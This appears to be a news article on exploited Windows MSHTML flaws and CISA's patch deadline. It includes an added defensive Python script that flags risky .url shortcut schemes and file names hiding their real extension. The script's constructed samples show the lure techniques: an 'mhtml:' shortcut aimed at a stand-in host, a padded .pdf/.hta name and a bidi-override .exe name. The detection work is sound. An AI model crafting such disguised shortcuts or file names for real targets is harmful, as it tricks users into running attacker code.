Here we go again. What was described as a "previously unknown" threat just three months ago has now prompted a third warning from the US government to update or stop using PCs. Attackers are exploiting old code buried under the covers of today's Windows systems, and it has quickly become clear that "a significant percentage of Windows devices are fully exposed and at risk of being taken over by attackers."
The latest vulnerability is CVE-2024-43573, which CISA, the US cybersecurity agency, warns is "an unspecified spoofing vulnerability which can lead to a loss of confidentiality." It has mandated all federal employees to "apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable" by October 29. In other words, update your PC within the next ten days, or stop using it until you can.
As ever, while CISA's mandate applies only to federal staff, it is intended "for the benefit of the cybersecurity community and network defenders -- and to help every organization better manage vulnerabilities and keep pace with threat activity." Given that this is the third actively exploited vulnerability of this kind since July, and that the initial fixes clearly did not complete the job, everyone is well advised to update right away. "Don't ignore this," Trend Micro warns. "Test and deploy this update quickly."
Timing-wise, the interesting twist with this October warning is the estimated 900 million Windows 10 users yet to move to Windows 11. Windows 10 is now just a year away from end-of-life, meaning end of support, which will cut those users off from updates such as this one. Worse, a reported 50 million Windows users are on even older, legacy versions of the OS that already receive no fixes, which means their machines are wide open to these threats.
The "previously unknown" threat that has now driven its third emergency update warning relates to MSHTML, the legacy Internet Explorer rendering engine that still ships inside Windows 10 and 11. As Check Point explained when describing the July attacks, the lure is a "special Windows Internet Shortcut file, which, when clicked, calls the retired Internet Explorer (IE) to visit the attacker-controlled URL... By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim's computer, although the computer is running the modern Windows 10/11 operating system."
The first of these vulnerabilities, CVE-2024-38112, was disclosed in July and linked to infostealer attacks that Trend Micro attributed to the APT group Void Banshee. Then in September, CISA added CVE-2024-43461 to its Known Exploited Vulnerabilities (KEV) catalog, warning it had been exploited "in conjunction with CVE-2024-38112."
Disclosing the second of these MSHTML vulnerabilities, Trend Micro explained that "the specific flaw exists within the way Internet Explorer prompts the user after a file is downloaded. A crafted file name can cause the true file extension to be hidden, misleading the user into believing that the file type is harmless. An attacker can leverage this vulnerability to execute code in the context of the current user."
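The two tricks described above, a .url Internet Shortcut that hands its target to a legacy handler, and a file name whose true extension is pushed out of view, lend themselves to simple triage heuristics that a defender can run over a downloads folder or a mail gateway quarantine. The following Python is an added example, not code from Trend Micro, Check Point or Microsoft. Its sample shortcut contents and file names are constructed; the "mhtml:" prefix in the sample shortcut comes from Check Point's published analysis of the July campaign rather than from this article; and the list of benign URL schemes, the list of dangerous extensions and the padding threshold are assumptions. It goes a little beyond the text by also flagging Unicode bidirectional override characters, another long-standing way of hiding an extension.

```python
"""Triage heuristics for two lures used against MSHTML: .url Internet
Shortcut files whose target is handed to a legacy handler, and file names
that hide their real extension. Added illustration, not vendor code; all
sample inputs below are constructed."""
import re
import unicodedata
from configparser import ConfigParser
from typing import Optional
from urllib.parse import urlsplit

# Schemes a benign .url shortcut normally carries (assumption). Anything
# else, e.g. the "mhtml:" prefix Check Point described for the July campaign,
# is flagged for a closer look.
BENIGN_SCHEMES = {"http", "https"}

# Extensions Explorer executes rather than displays (assumption: common list).
DANGEROUS_EXTENSIONS = {".hta", ".exe", ".js", ".jse", ".vbs", ".wsf", ".cmd",
                        ".bat", ".ps1", ".scr", ".url", ".lnk"}

# Blank characters between a decoy extension and the real one before we call
# it spoofing (assumption: legitimate names rarely carry more than a couple).
PADDING_THRESHOLD = 8

BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
BRAILLE_BLANK = "\u2800"  # renders as empty space but is category "So"


def parse_internet_shortcut(text: str) -> dict:
    """Parse the INI-style body of a .url file and classify its target URL."""
    cp = ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    url = cp.get("InternetShortcut", "URL", fallback="").strip()
    scheme = urlsplit(url).scheme.lower()
    return {"url": url, "scheme": scheme,
            "suspicious": scheme not in BENIGN_SCHEMES}


def is_visually_blank(ch: str) -> bool:
    """True for characters that render as nothing or as empty space."""
    return ch == BRAILLE_BLANK or unicodedata.category(ch) in {"Zs", "Cf", "Cc"}


def analyze_filename(name: str) -> dict:
    """Separate what the user is shown from the extension Windows acts on.

    Flags (a) a decoy extension followed by a long run of blank characters
    and then a dangerous real extension, and (b) any bidi override, which
    can visually reverse the tail of a name.
    """
    stem, dot, ext = name.rpartition(".")
    true_ext = ("." + ext).lower() if dot else ""
    padding = 0
    while stem and is_visually_blank(stem[-1]):
        stem = stem[:-1]
        padding += 1
    match = re.search(r"\.[A-Za-z0-9]{1,5}$", stem)
    decoy_ext = match.group(0).lower() if match else ""
    bidi = any(ch in BIDI_CONTROLS for ch in name)
    spoofed = bidi or (
        bool(decoy_ext)
        and padding >= PADDING_THRESHOLD
        and true_ext in DANGEROUS_EXTENSIONS
    )
    return {"true_ext": true_ext, "decoy_ext": decoy_ext, "padding": padding,
            "bidi_override": bidi, "flagged": spoofed}


def triage_download(name: str, contents: Optional[str] = None) -> dict:
    """Run both checks on one file; contents is only inspected for .url files."""
    report = analyze_filename(name)
    if report["true_ext"] == ".url" and contents is not None:
        report["shortcut"] = parse_internet_shortcut(contents)
        report["flagged"] = report["flagged"] or report["shortcut"]["suspicious"]
    return report


# Constructed samples, not real captures.
SAMPLE_SHORTCUT = (
    "[InternetShortcut]\r\n"
    "URL=mhtml:file://C:\\Users\\Public\\note.mht!x-usc:http://203.0.113.10/x\r\n"
    "ShowCommand=7\r\n"
)
SAMPLE_BENIGN_SHORTCUT = "[InternetShortcut]\r\nURL=https://www.example.com/\r\n"
SAMPLE_PADDED_NAME = "Quarterly report.pdf" + BRAILLE_BLANK * 26 + ".hta"
SAMPLE_BIDI_NAME = "invoice\u202efdp.exe"  # displays roughly as invoiceexe.pdf

if __name__ == "__main__":
    for fname, body in [("note.url", SAMPLE_SHORTCUT),
                        ("docs.url", SAMPLE_BENIGN_SHORTCUT),
                        (SAMPLE_PADDED_NAME, None),
                        (SAMPLE_BIDI_NAME, None),
                        ("report.pdf", None)]:
        print(repr(fname), triage_download(fname, body))
```

The scheme check is deliberately an allow-list: a shortcut that points anywhere other than http(s) is rare in legitimate mail and cheap to review by hand, whereas a deny-list of known-bad prefixes would miss the next variant. The file-name check keys on the gap between the extension a user sees and the one Windows will dispatch on, which is the property the Trend Micro description above calls out.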
As for CVE-2024-43573, the third MSHTML vulnerability in as many months (and the fourth this year, counting CVE-2024-30040, disclosed in May), Trend Micro says it "is also very similar to the bug patched back in July... There's no word from Microsoft on whether it's the same group, but considering there is no acknowledgment here, it makes us think the original patch was insufficient."
Given the risk that the original fixes for the MSHTML threat were "insufficient," all Windows users should update now, and confirm that October's Patch Tuesday updates have actually been applied rather than merely downloaded. There are clearly multiple active campaigns in the wild exploiting this "previously unknown" weakness, and that will only get worse.
That also means that if you are already out of support, or will be when Windows 10 reaches end-of-life in October 2025, you should consider your options now.